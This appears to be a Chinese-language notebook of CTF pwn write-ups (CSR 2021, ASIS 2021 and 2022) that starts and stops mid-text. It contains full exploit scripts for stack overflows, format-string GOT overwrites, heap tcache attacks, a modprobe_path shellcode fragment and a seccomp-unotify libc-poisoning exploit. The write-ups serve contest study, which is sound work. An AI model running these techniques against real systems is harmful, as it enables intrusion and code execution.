    return 0;
}

void shellcode()
{
    __asm__(
        "mov rdi, [rsp+0x10];"
        "add rdi, 0x11b2097;"
        "mov rsi, 0x792f706d742f;" // "/tmp/y"
        "mov [rdi], rsi;"          // modprobe_path
        "ud2;" ::
            :);
}

CSR 2021

getstat

CSR 2021

这个比赛的pwn题好少, 就做个样子. 反而是cry(???)和ethereum较多. 而rev这种还有一题是unity背景, 这个也是不会的…

不过看了别人的wp还是挺有趣的.

比较简单, 直接提供shell()函数, 而且PIE. 有canary, 但是没有方法可以leak. 于是就得绕过. 覆盖返回地址.

主要的问题是无符号数输入加上这段:

.text:0000000000401109                 lea     rax, [rdx*8]
.text:0000000000401111                 and     rax, 0FFFFFFFFFFFFFFF0h
.text:0000000000401115                 sub     rsp, rax

如果rdx是负数(一致性), 那么rsp减去负数就会增加, 导致栈收缩.

直接把rsp收缩到返回地址附近, 此时再覆盖地址即可.

唯一一个新问题是在python中把整数pack成浮点数. 新的方法如下:

def iToF(i):
  b = struct.pack('q', i)
  return struct.unpack('d', b)[0]
Functions to convert between Python values and C structs.
The optional first format char indicates byte order, size and alignment:
    @: native order, size & alignment (default)
    =: native order, std. size & alignment
    <: little-endian, std. size & alignment
    >: big-endian, std. size & alignment
    !: same as >

The remaining chars indicate types of args and must match exactly;
these can be preceded by a decimal repeat count:
    x: pad byte (no data); c:char; b:signed byte; B:unsigned byte;
    ?: _Bool (requires C99; if not available, char is used instead)
    h:short; H:unsigned short; i:int; I:unsigned int;
    l:long; L:unsigned long; f:float; d:double; e:half-float.
Special cases (preceding decimal count indicates length):
    s:string (array of char); p: pascal string (with count byte).
Special cases (only available in native format):
    n:ssize_t; N:size_t;
    P:an integer type that is wide enough to hold a pointer.
Special case (not in native mode unless 'long long' in platform C):
    q:long long; Q:unsigned long long
Whitespace between formats is ignored.

exp:

from pwn import *
import struct

def iToF(i):
  b = struct.pack('q', i)
  return struct.unpack('d', b)[0]
  
addr = 0x401360

r = process('./getstat')
r.sendlineafter(b':', b'-10')
r.sendlineafter(b':', b'0')
r.sendlineafter(b':', bytes(str(iToF(addr)), 'utf-8'))
r.sendlineafter(b':', b'a')
r.sendline(b'cat /flag')
print(r.clean())

SSE instructions:

注意的点:

  • 分支分析, 就比如这个输入不符合浮点数的输入就会break.
  • 无符号和有符号运算的一致性…

CSRunner

图一乐.

ASIS CTF 2021

Justpwnit

no canary PIE.

输入一个负数, 然后覆盖rbp为堆指针, 最终stack pivot到heap上, 最后执行exec("/bin/sh\x00", NULL, NULL)

还在纠结system/read&write/sendfile的时候发现还可以用mov qword ptr [rax], rsi ; ret来把/bin/sh写入bss段…

Abbr

同上, 分数71, 应该是难一点点

  • strncasecmp: compare two strings ignoring case.

注意下stack pivot还可用xchg指令… 可以刚好找到xchg esp, eax. 又因为PIE已关, 所以4字节能够装下bss和heap段的地址.

不过看到另一个exp里确实绕了一大圈使用了printf的任意读能力leak出地址. 有点复杂了.

strvec

github src, 114 points

找漏洞的过程完全就是一个人脑fuzzing…

保护全开. 大体思路仍来自别人的wp…

Vulnerability

好了, 是下面代码的一个整数溢出, 可以做到一个很大的vec->size以及很小的malloc(size)

vector *vector_new(int nmemb) {
  if (nmemb <= 0)
    return NULL;
  int size = sizeof(vector) + sizeof(void*) * nmemb;    //8+8*n = 8*(n+1)
                                                        //0x40000004
  vector *vec = (vector*)malloc(size);
  if (!vec)
    return NULL;
  memset(vec, 0, size);
  vec->size = nmemb;
  return vec;
}

这样的话get和set两个函数在一定范围内都没有了限制, 不过只能get heap段之后的地址区域. 好像只有heap了…

Leak heap address

到现在get了一个arbitrary read. 可以leak一下堆地址, 方法是通过get已释放的chunk的tcache链表指针.

然后呢?不知道了, 卡了半天, 没想到经验是如此的不足, 知道下一步是leak libc还是想不出来怎么做.

好吧现在想出来了, 就是靠伪造一个chunk然后再释放加入unsortedbin中就可以读取fd指针, 从而获得libc_base.

Arbitrary write

方法是释放tcache struct, 放到unsorted bin中, 方法是先填满0x290大小的tcache链表, 使得再次free tcache struct的时候可以进入unsorted bin, 进而让fd和bk指针覆盖0x30的count变成一个很大的数值, 使得可以在tcache链上malloc任意数量的伪造的tcache fd指针, 最终分配到__malloc_hook, 实现修改下一次malloc时的流程控制.

卡了一会儿的是差点忘了释放0x420的chunk的时候会尝试前后合并, 而0x421会阻止后向合并, 此时必须设置好nextchunk的nextsize_inuse位, 以阻止前向合并.

Pop a shell

可以使用ROP的方式, 不过有canary的限制, 在此之前还要知道stack和canary的值.

更简单的方法是使用one_gadget一一检查有无满足对应条件的gadget, 这样只要覆盖malloc_hook到对应gadget地址即可.

from pwn import *
binary = './strvec.elf64'
libc = ELF('./libc-2.31.so')
context.binary = binary
context.log_level = 'debug'
ss=lambda x:p.send(x)       #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv()         #recv one
rn=lambda x:p.recv(x)       #recv n
sa=lambda x,y:p.sendafter(x,y)
sla=lambda x,y:p.sendlineafter(x,y)
itt=lambda :p.interactive()
c = 1
if c == 0:
    p = remote("chall.rumble.host", 5415)
else:
    p = process(binary, aslr=False)

def get(idx:int) -> int:
    sla(b'> ', b'1')
    sla(b'idx =', str(idx).encode())
    ru(b'-> ')
    data = p.recvline(False)
    if b'[undefined]' in data:
        log.error('get idx:{idx} [undefined]')
    data = u64(data.ljust(8, b'\x00'))
    return data

def set(idx:int, data:bytes=b'\x00'):
    sla(b'> ', b'2')
    sla(b'idx =', str(idx).encode())
    sa(b'data = ', data[:-1] if len(data)==0x20 else data+b'\n')
    rl()

def initial():
    sl(b'Yogdzewa')
    sl(str(0x40000004))


initial()
set(5, p64(0)+b'b'*0x18)
chunk1_addr = get(5)
log.success(f'data is: 0x{chunk1_addr:x}')

set(5, flat([0, 0x421]))
set(7, flat([chunk1_addr+0x40, chunk1_addr+0x40], 0, 0))

#gdb.attach(p)
for i in range(5):
    for j in range(4):
        log.success(f'idx is: {17+j+i*6}')
        set(17+j+i*6, b'\x00')
set(0)
#the nextchunk header set
set(1, flat([0, 0x31]))

gdb.attach(p)
#this will malloc a chunk first, so that puts a chunk between
#top chunk and freed one. Will not get into **consolidate forward**
set(5, flat([0, 0x31]))
fd_ptr = get(6)
log.success(f'fd_ptr is: 0x{fd_ptr:x}')
libc.address = fd_ptr - 0x1ebbe0
log.success(f'libc_base is: 0x{libc.address:x}')

# work-in-progress





itt()

ASIS CTF 2022

babyscan-1

非预期解, 因为%0s相当于不限制长度. 而且amlloc不改变rsp, 就是直接对栈进行覆盖. 来自r3kapig.

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/ASIS/babyscan/bin/chall')
r = remote('65.21.255.31',13370)
elf = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan/bin/chall')
libc = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan/lib/libc.so.6')

# gdb.attach(r)
r.recvuntil(b"size: ")
r.sendline(str(0))

r.recvuntil("data: ")
pop_rdi = 0x0000000000401433

payload = b'a'*0x48+p64(pop_rdi)+p64(elf.got["alarm"])+p64(elf.plt["puts"])+p64(0x401130) # _start
r.sendline(payload)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))-libc.sym["alarm"]
r.recvuntil(b"size: ")
r.sendline(str(0))
r.recvuntil("data: ")
ogg = libc_base+0xe3b01	# getted by one_gadget
r.sendline(b'a'*0x48+p64(ogg))


r.interactive()

babyscan-2

src:

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
  char size[16], fmt[8], *buf;

  printf("size: ");
  scanf("%15s", size);
  if (!isdigit(*size))
    puts("[-] Invalid number");
    exit(1);
  }

  buf = (char*)malloc(atoi(size) + 1);

  printf("data: ");
  snprintf(fmt, sizeof(fmt), "%%%ss", size); //vuln is here
  scanf(fmt, buf);

  exit(0);
}

__attribute__((constructor))
void setup(void) {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  alarm(180);
}

exp: 来自r3kapig-Lotus

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/ASIS/babyscan2/bin/chall')
#r = remote('65.21.255.31',33710)
elf = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan2/bin/chall')
libc = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan2/lib/libc.so.6')

def Lotus_write(addr,content):
    r.recvuntil(b"size: ")
    r.send(b'9$\x00\x00\x00\x00\x00\x00'+p64(addr)[:7])
    r.recvuntil("data: ")
    r.sendline(content)

# gdb.attach(r,'b *0x40132b')
# gdb.attach(r,'b *0x401286')
# Lotus_write(elf.got["atoi"],p64(elf.plt["printf"])+p64(0x401140)+p64(0x401256)[:7])
Lotus_write(elf.got["exit"],p64(0x401256)[:7])
# gdb.attach(r,'b *0x40128B')
# r.recvuntil(b"size: ")
# r.sendline(b'%p')

# print(hex(elf.plt["atoi"]))
Lotus_write(elf.got["atoi"],p64(elf.plt["printf"])[:7])
# gdb.attach(r,'b *0x4012CD')

r.recvuntil(b"size: ")
r.sendline(b'1-%9$p+')
r.recvuntil(b'-')
libc_base = int(r.recvuntil(b'+')[:-1],16)-0x9A154
r.recvuntil(b"data: ")
r.sendline(b'a')
ogg = libc_base+0xe3b01
Lotus_write(elf.got["printf"],p64(ogg)[:7])
# gdb.attach(r)
# r.recvuntil(b"size: ")
# r.sendline(b'15')

log.success("libc_base: "+hex(libc_base))
r.interactive()

readable

终于发现了这题目环境的用法, 先是build.sh编译一下然后再docker build, 然后deploy.py中有一句socat命令是在本地开一个端口接收exp文件, 保存为tempfile, 然后映射到docker中的/tmp/exploit, 继续启动docker, 完成权限设置之后执行/home/pwn/run. run设置了seccomp之后execve了exploit, 然后再怎么执行readme就是我们的事了.

solution 1

X32 ABI直接ptrace拿mmap的pie基址劫持write直接leak, 直接利用mmap系统调用时的地址信息打印出前0x2000的东西, 这样直接就可以发现flag.

这个编译起来不得使用32位? 试下. 还是得64位.

#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#include <sys/personality.h>
#include <sys/user.h>
#include <sys/mman.h>
unsigned long long base = 0;
struct user_regs_struct *regs = NULL;

int main(int argc, char *argv[])
{   
    // X32 ABI 对指针要求 32 位
    regs = mmap((void *)0x233000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
    pid_t traced_process;
    long ins;
    char *argvs[] = {"/home/pipe/readme",NULL};
    int pid = fork();
    if (pid == 0) {
        // ptrace(PTRACE_TRACEME, 0, 0, 0);
        syscall(0x40000209,PTRACE_TRACEME, 0, 0, 0);
        execve("/home/pipe/readme", argvs, NULL);
        puts("exec failed");
        return -1;
    }
    wait(NULL);
    while (1) {
        int blocked = 0;
        // Wait until the child makes a syscall
        // ptrace(PTRACE_SYSCALL, pid, 0, 0);
        syscall(0x40000209,PTRACE_SYSCALL, pid, 0, 0);
        
        waitpid(pid, 0, 0);
        
        // ptrace(PTRACE_GETREGS, pid, 0, &regs);
        syscall(0x40000209,PTRACE_GETREGS, pid, 0, regs);
        // 获取程序基址,用 strace 在本地观察得到特征
        if(regs->orig_rax == 10 && regs->rsi==0x1000)
        {
            printf("Mmap Rdi:%08llx\nMmap Rsi:%08llx\nMmap Rdx:%08llx\n",regs->rdi,regs->rsi,regs->rdx);
            base = regs->rdi;
        }
        // 随便劫持一个 Write 的系统调用,rsi 劫持到基址,rdx 大小大一点
        if (regs->orig_rax == 1 && regs->rdx == 0x10) {
            blocked = 1;
            printf("Rsi before:%08llx\n",regs->rsi);
            regs->rdx = 0x2000;
            regs->rsi = base;
            printf("Rsi after:%08llx\n",regs->rsi);
            // ptrace(PTRACE_SETREGS, pid, 0, regs);
            syscall(0x40000209,PTRACE_SETREGS, pid, 0, regs);
        }
        // Continue on with the now blocked syscall
        // ptrace(PTRACE_SYSCALL, pid, 0, 0);
        syscall(0x40000209,PTRACE_SYSCALL, pid, 0, 0);

        waitpid(pid, 0, 0);
        // If the program checks return value of the write, we need to make sure that the return value isn't `-ENOSYS`
        // if (blocked) {regs->rax = 1; ptrace(PTRACE_SETREGS, pid, 0, regs); }
        if (blocked) {regs->rax = 1; syscall(0x40000209,PTRACE_SETREGS, pid, 0, regs); break;}
    }
    return 0;
}

真正的系统调用号保存在 /usr/include/x86_64-linux-gnu/asm/unistd_x32.h:

#ifndef _ASM_X86_UNISTD_X32_H
#define _ASM_X86_UNISTD_X32_H 1

#define __NR_read (__X32_SYSCALL_BIT + 0)
#define __NR_write (__X32_SYSCALL_BIT + 1)
#define __NR_open (__X32_SYSCALL_BIT + 2)
...
#define __NR_ioctl (__X32_SYSCALL_BIT + 514)
#define __NR_readv (__X32_SYSCALL_BIT + 515)
#define __NR_writev (__X32_SYSCALL_BIT + 516)
#define __NR_recvfrom (__X32_SYSCALL_BIT + 517)
#define __NR_sendmsg (__X32_SYSCALL_BIT + 518)
#define __NR_recvmsg (__X32_SYSCALL_BIT + 519)
#define __NR_execve (__X32_SYSCALL_BIT + 520)
#define __NR_ptrace (__X32_SYSCALL_BIT + 521)
...
  • __X32_SYSCALL_BIT的值为0x40000000, 所以上面的数值上就可以解释了.

  • int 0x80 和 syscall 的区别 (好吧跟这个没啥关系.

  • 主要利用点在于x64下有一种x32 ABI模式, 能够在减小指针和地址空间开销的同时利用起64位cpu上多的寄存器和运算部件, 提高程序运行速度. 他的系统调用就如上面所示, 只要加上一个数值即可, 或者说是按位或(|). 而寄存器高32位的部分都被清空, 以此模拟32位运行状态.

还没有run过, 第二天环境弄一个小时没整好, 看来还是得靠docker. 终于知道了这一堆东西怎么用了.

不过为什么没法直接跑通? 看着挺好的呀, 但是看起来ptrace全都失败了, regs里面没有一点信息.

我还不知道在docker里面运行的程序如何调试.

ptrace真的fail了, 返回了一个-1. 继续查查errno看是什么. 是not implement. 不知道了. 只能一问队友.

crazyman说ubuntu18能行, 但是docker里面改成18.04并不可行. emmmmm?难道不是这样么?

22/11/14在编译linux时发现有一个选项是x32 ABI for 64 bit mode, 勾上了重新编译, 尝试了下能不能运行.

修改HOME路径, 再把readme重新编译成静态文件, 放到HOME中设置成其他用户只读, 忽略run.c(因为他只是限制了一下可用的系统调用)

还是遇到了很多问题.

  • 使用busybox的linux还是有很多限制, 每个文件都得编译成静态文件, 使得本来是PIE的readme变成静态链接文件, 然后mmap调用似乎消失了, ptrace根本截取不到(???), 也没有strace看到底发生了什么.
  • 而且静态链接也使得文件变得很大, 仅输出前面0x2000字节还是不够, 还得调整.

不过好在发现了这个方法确实可行, 不过docker里面的系统似乎都没有加上这一个选项, 想来当时比赛时的环境可以吧. 不过明明都是同一个Dockerfile怎么还不一样呢.

solution 2 - intended one

given by the author

作者原话:
  • Intended way was using seccomp unotify to change libc binary
  • Linker loads libc, you set a hook for openat. And then use seccomp_setfd to send a poisoned libc

seccomp unotify: user notify, 可以做到在syscall的时候携带信息给supervisor(大多都是container应用), 让它来决定是继续执行syscall还是停止执行并返回特定数值.

流程:
  • solve.py上传了exploit, 然后exploit在docker里接受payload放到/tmp/payload.
  • exp使用UNIX domain socket建立程序间通信渠道.
  • 装载sigchild signal的处理函数, handler直接执行exit().
  • fork出子进程, 一通prctl+install seccomp unotifier之后通过socket发送notifyfd到父进程, 再执行/home/pwn/readme.
    其中install的规则主要是为openat装载unotify.
  • (然后都是unotify supervisor的基本流程)
  • 通过socket接受unotify fd. (这个流程也很长, 使用了recvmsg等一系列奇怪函数, 不管了.)
  • 通过ioctl来轮询fd, 当readme openat的时候会被打断, 此时由父进程打开payload文件, 然后通过seccomp_notif_addfd来复制fd到子进程的fd列表之中, 由ioctl返回在子进程中最终打开的fd number, 最后response, 设置openat syscall的返回值为该fd number.
  • 上面的流程是一个死循环, 由child exit到signal handler终止所有进程.
关键点:
  • UNIX domain socket or IPC socket
#include <sys/socket.h>
sockfd = socket(int socket_family, int socket_type, int protocol);

其中socket_family=AF_UNIX, socket_type有三种(TCP UDP SCTP?)

send是fd和recvfd函数都是使用sendmsg来…看不懂, 一堆宏定义, 反正知道他能通过socket fd来传递fd就行了.

  • seccomp unotify:seccomp(SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);

因为glibc没有对seccomp wrap, 所以实际上是:

static int seccomp(unsigned int operation, unsigned int flags, void *args){
  return syscall(__NR_seccomp, operation, flags, args); }

第一个SECCOMP_SET_MODE_FILTER就是指把arg当成BPF指针来定义一个filter. 这个filter在fork clone execve的时候保留下来. 前提是调用的线程必须在它的namespace里有CAP_SYS_ADMIN, 或者已经设置了no_new_privs位.

一般都关注后者, 也就是通过prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)设置. 这个process control函数配上这些参数能够限制execve执行setuid的程序, 否则通过execve执行setuid程序后装载一个不执行setuid()且返回0的filter时, 这样的程序会在没有真正drop privileges的情况下继续运行malicious commands.

而第二个参数flags要使用SECCOMP_FILTER_FLAG_NEW_LISTENER, 这样成功安装filter后,返回一个新的user-space notification file。(为文件描述符设置了“close-on-exec” flag。)当filter返回SECCOMP_RET_USER_NOTIF时,将向该fd发送通知。每线程最多只能装载一个带有这个flag的filter.

  • SECCOMP_IOCTL_NOTIF_ADDFD

The SECCOMP_IOCTL_NOTIF_ADDFD operation (available since Linux5.9) allows the supervisor to install a file descriptor into thetarget’s file descriptor table.

总之就是将symbol绑定到version node上, 一个symbol可以有多个version node, 最关键的是map file.

同时可以在库的源代码中添加绑定信息, 这样可以减少shared library maintainr的工作, 不过此时mapfile必须包括所有的version node, 也就是这个asm trick只是mapfile的补充.

经过测试, solution中的payload.c可以大幅度缩减, payload.map也可以删去2.34的定义:

  • puts完全没必要, 只要__libc_start_main被修改为write函数之后就已经达成目的.
  • 源码中使用asm把__libc_start_main_impl当做__libc_start_main的alias,
    不过也可以直接不要impl, 直接__libc_start_main就行了
  • 头文件也没必要. 2.2.5也没必要. 为什么是这个版本号我也不知道.
  • 过了一个月再试发现payload.map里2.2.5和2.34都不能删去, 否则libc会报version not found. 原因未知.
exp:
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/un.h>
#include <unistd.h>

#define errExit(msg)    \
  do                    \
  {                     \
    perror(msg);        \
    exit(EXIT_FAILURE); \
  } while (0)

/* Send the file descriptor 'fd' over the connected UNIX domain socket
  'sockfd'. Returns 0 on success, or -1 on error. */

static int sendfd(int sockfd, int fd)
{
  struct msghdr msgh;
  struct iovec iov;
  int data;
  struct cmsghdr *cmsgp;

  /* Allocate a char array of suitable size to hold the ancillary data.
     However, since this buffer is in reality a 'struct cmsghdr', use a
     union to ensure that it is suitably aligned. */
  union
  {
    char buf[CMSG_SPACE(sizeof(int))];
    /* Space large enough to hold an 'int' */
    struct cmsghdr align;
  } controlMsg;

  /* The 'msg_name' field can be used to specify the address of the
     destination socket when sending a datagram. However, we do not
     need to use this field because 'sockfd' is a connected socket. */

  msgh.msg_name = NULL;
  msgh.msg_namelen = 0;

  /* On Linux, we must transmit at least one byte of real data in
     order to send ancillary data. We transmit an arbitrary integer
     whose value is ignored by recvfd(). */

  msgh.msg_iov = &iov;
  msgh.msg_iovlen = 1;
  iov.iov_base = &data;
  iov.iov_len = sizeof(int);
  data = 12345;

  /* Set 'msghdr' fields that describe ancillary data */

  msgh.msg_control = controlMsg.buf;
  msgh.msg_controllen = sizeof(controlMsg.buf);

  /* Set up ancillary data describing file descriptor to send */

  cmsgp = CMSG_FIRSTHDR(&msgh);
  cmsgp->cmsg_level = SOL_SOCKET;
  cmsgp->cmsg_type = SCM_RIGHTS;
  cmsgp->cmsg_len = CMSG_LEN(sizeof(int));
  memcpy(CMSG_DATA(cmsgp), &fd, sizeof(int));

  /* Send real plus ancillary data */

  if (sendmsg(sockfd, &msgh, 0) == -1)
    return -1;

  return 0;
}

/* Receive a file descriptor on a connected UNIX domain socket. Returns
  the received file descriptor on success, or -1 on error. */

static int recvfd(int sockfd)
{
  struct msghdr msgh;
  struct iovec iov;
  int data, fd;
  ssize_t nr;

  /* Allocate a char buffer for the ancillary data. See the comments
     in sendfd() */
  union
  {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
  } controlMsg;
  struct cmsghdr *cmsgp;

  /* The 'msg_name' field can be used to obtain the address of the
     sending socket. However, we do not need this information. */

  msgh.msg_name = NULL;
  msgh.msg_namelen = 0;

  /* Specify buffer for receiving real data */

  msgh.msg_iov = &iov;
  msgh.msg_iovlen = 1;
  iov.iov_base = &data; /* Real data is an 'int' */
  iov.iov_len = sizeof(int);

  /* Set 'msghdr' fields that describe ancillary data */

  msgh.msg_control = controlMsg.buf;
  msgh.msg_controllen = sizeof(controlMsg.buf);

  /* Receive real plus ancillary data; real data is ignored */

  nr = recvmsg(sockfd, &msgh, 0);
  if (nr == -1)
    return -1;

  cmsgp = CMSG_FIRSTHDR(&msgh);

  /* Check the validity of the 'cmsghdr' */

  if (cmsgp == NULL || cmsgp->cmsg_len != CMSG_LEN(sizeof(int)) ||
      cmsgp->cmsg_level != SOL_SOCKET || cmsgp->cmsg_type != SCM_RIGHTS)
  {
    errno = EINVAL;
    return -1;
  }

  /* Return the received file descriptor to our caller */

  memcpy(&fd, CMSG_DATA(cmsgp), sizeof(int));
  return fd;
}

static void sigchldHandler(int sig)
{
  // char msg[] = "\tS: target has terminated; bye\n";

  // write(STDOUT_FILENO, msg, sizeof(msg) - 1);
  puts("Child exited");
  _exit(EXIT_SUCCESS);
}

static int seccomp(unsigned int operation, unsigned int flags, void *args)
{
  return syscall(__NR_seccomp, operation, flags, args);
}

#define X32_SYSCALL_BIT 0x40000001

#define X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR                                  \
  BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))),   \
      BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2),            \
      BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))), \
      BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, X32_SYSCALL_BIT, 0, 1),              \
      BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS)

static int installNotifyFilter(void)
{
  struct sock_filter filter[] = {
      X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR,

      BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_openat, 0, 1),
      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_USER_NOTIF),

      BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
  };

  struct sock_fprog prog = {
      .len = sizeof(filter) / sizeof(filter[0]),
      .filter = filter,
  };

  int notifyFd =
      seccomp(SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);
  if (notifyFd == -1)
    errExit("seccomp-install-notify-filter");

  return notifyFd;
}

static void closeSocketPair(int sockPair[2])
{
  if (close(sockPair[0]) == -1)
    errExit("closeSocketPair-close-0");
  if (close(sockPair[1]) == -1)
    errExit("closeSocketPair-close-1");
}

static pid_t targetProcess(int sockPair[2], char *argv[])
{
  pid_t targetPid = fork();
  if (targetPid == -1)
    errExit("fork");

  if (targetPid > 0) /* In parent, return PID of child */
    return targetPid;

  if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
    errExit("prctl");

  int notifyFd = installNotifyFilter();

  if (sendfd(sockPair[0], notifyFd) == -1)
    errExit("sendfd");

  /* Notification and socket FDs are no longer needed in target */

  if (close(notifyFd) == -1)
    errExit("close-target-notify-fd");

  closeSocketPair(sockPair);

  /* Perform a mkdir() call for each of the command-line arguments */
  puts("Executing child");
  sleep(1);
  char *f = NULL;
  execve("/home/pwn/readme", &f, &f);
  // openat(AT_FDCWD,"/bin/bash",0);
  exit(EXIT_SUCCESS);
}

static void allocSeccompNotifBuffers(struct seccomp_notif **req,
                                     struct seccomp_notif_resp **resp,
                                     struct seccomp_notif_sizes *sizes)
{
  if (seccomp(SECCOMP_GET_NOTIF_SIZES, 0, sizes) == -1)
    errExit("seccomp-SECCOMP_GET_NOTIF_SIZES");

  *req = malloc(sizes->seccomp_notif);
  if (*req == NULL)
    errExit("malloc-seccomp_notif");

  size_t resp_size = sizes->seccomp_notif_resp;
  if (sizeof(struct seccomp_notif_resp) > resp_size)
    resp_size = sizeof(struct seccomp_notif_resp);

  *resp = malloc(resp_size);
  if (resp == NULL)
    errExit("malloc-seccomp_notif_resp");
}

static void handleNotifications(int notifyFd)
{
  struct seccomp_notif_sizes sizes;
  struct seccomp_notif *req;
  struct seccomp_notif_resp *resp;
  char path[PATH_MAX];

  allocSeccompNotifBuffers(&req, &resp, &sizes);

  /* Loop handling notifications */

  for (;;)
  {
    /* Wait for next notification, returning info in '*req' */

    memset(req, 0, sizes.seccomp_notif);
    if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_RECV, req) == -1)
    {
      if (errno == EINTR)
        continue;
      errExit("\tS: ioctl-SECCOMP_IOCTL_NOTIF_RECV");
    }

    if (req->data.nr != __NR_openat)
    {
      printf(
          "\tS: notification contained unexpected "
          "system call number; bye!!!\n");
      exit(EXIT_FAILURE);
    }

    struct seccomp_notif_addfd addfd;
    addfd.id = req->id; /* Cookie from SECCOMP_IOCTL_NOTIF_RECV */
    addfd.srcfd = openat(req->data.args[0], "/tmp/payload", req->data.args[2], req->data.args[3]);
    addfd.newfd = 3;
    addfd.flags = SECCOMP_ADDFD_FLAG_SETFD;
    addfd.newfd_flags = 0;
    int a2 = ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_ADDFD, &addfd);

    resp->id = req->id;
    resp->flags = 0;
    resp->val = 0;
    resp->error = resp->val = 0;
    resp->val = a2;

    resp->flags = 0;

    if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_SEND, resp) == -1)
    {
      if (errno == ENOENT)
        printf(
            "\tS: response failed with ENOENT; "
            "perhaps target process's syscall was "
            "interrupted by a signal?\n");
      else
        perror("ioctl-SECCOMP_IOCTL_NOTIF_SEND");
    }
  }

  free(req);
  free(resp);
  exit(EXIT_FAILURE);
}

/* Implementation of the supervisor process:

  (1) obtains the notification file descriptor from 'sockPair[1]'
  (2) handles notifications that arrive on that file descriptor. */

static void supervisor(int sockPair[2])
{
  int notifyFd = recvfd(sockPair[1]);
  if (notifyFd == -1)
    errExit("recvfd");

  closeSocketPair(sockPair); /* We no longer need the socket pair */

  handleNotifications(notifyFd);
}

void readBinary()
{
  int sz, readed;
  printf("size:");
  scanf("%d", &sz);
  char *buf = malloc(sz);

  int f = open("/tmp/payload", O_WRONLY | O_CREAT, 0777);
  while (sz > 0)
  {
    readed = read(0, buf, sz);
    write(f, buf, readed);
    sz -= readed;
  }
}

int main(int argc, char *argv[])
{
  int sockPair[2];

  setbuf(stdout, NULL);
  readBinary();
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockPair) == -1)
    errExit("socketpair");

  struct sigaction sa;
  sa.sa_handler = sigchldHandler;
  sa.sa_flags = 0;
  sigemptyset(&sa.sa_mask);
      
  if (sigaction(SIGCHLD, &sa, NULL) == -1)
    errExit("sigaction");
  targetProcess(sockPair, &argv[optind]);

  supervisor(sockPair);

  exit(EXIT_SUCCESS);
}
payload:
// #include <unistd.h>
// #include <asm/unistd.h>

// __asm__(".symver __libc_start_main_impl,__libc_start_main@GLIBC_2.34");
// __asm__(".symver __libc_start_main_impl,__libc_start_main@GLIBC_3.2.5");
// __asm__(".symver puts_impl,puts@GLIBC_2.2.5");
// __asm__(".symver puts_impl,puts@GLIBC_2.34");


void __libc_start_main(){
    asm(".intel_syntax noprefix");
    asm("mov rax,1");
    asm("mov rsi,rdi");
    asm("mov rdi,1");
    asm("mov rdx,0x1000");
    asm("syscall");
}

// void puts_impl(){
//     asm(".intel_syntax noprefix");
//     asm("mov rax,1");
//     asm("mov qword ptr [rax],1");
// }
map:
GLIBC_2.34 {
        global: __libc_start_main;puts;
        local:  *;      # Hide all other symbols
};
GLIBC_2.2.5 {
        global: __libc_start_main;
        local:  *;      # Hide all other symbols
};

solution 3 - ?

team solution

#include <sys/prctl.h>

int main(void)
{
        prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
        execlp("bash", "bash", "-c", "LD_DEBUG=all sudo", NULL);
}

然后呢? 没看懂

呃呃感觉是上一种方法的一个步骤,

  • LD_DEBUG能打印出ld在加载共享库时的信息, 包括符号信息.
  • PR_SET_NO_NEW_PRIVS让之后的exec执行的新程序无法通过简单的setgid或者修改文件权限获得新的权限.

这里是解法来源link

jsy

最短的一个exp, 最长的有几千行不知道在写啥. 最短的也不知道在写啥.

发现了文档, 原来是一个js解释器, 是一个现成的项目. 那个patch是真是存在的一个漏洞吗? 这代码量也太大了…js也不怎么会…

patch里加的free可以double free,2.35的glibc,可以通过占位控制某个header实现任意地址读写

没有Buffer,可以用Array,header大小应该是0x90

Array被free时,貌似只有header被free了,body不会被free

@zanderdk的解释:

Short explanation: We use quite to create a object of type JS_CCFUNCTION which will have c union type bellow:
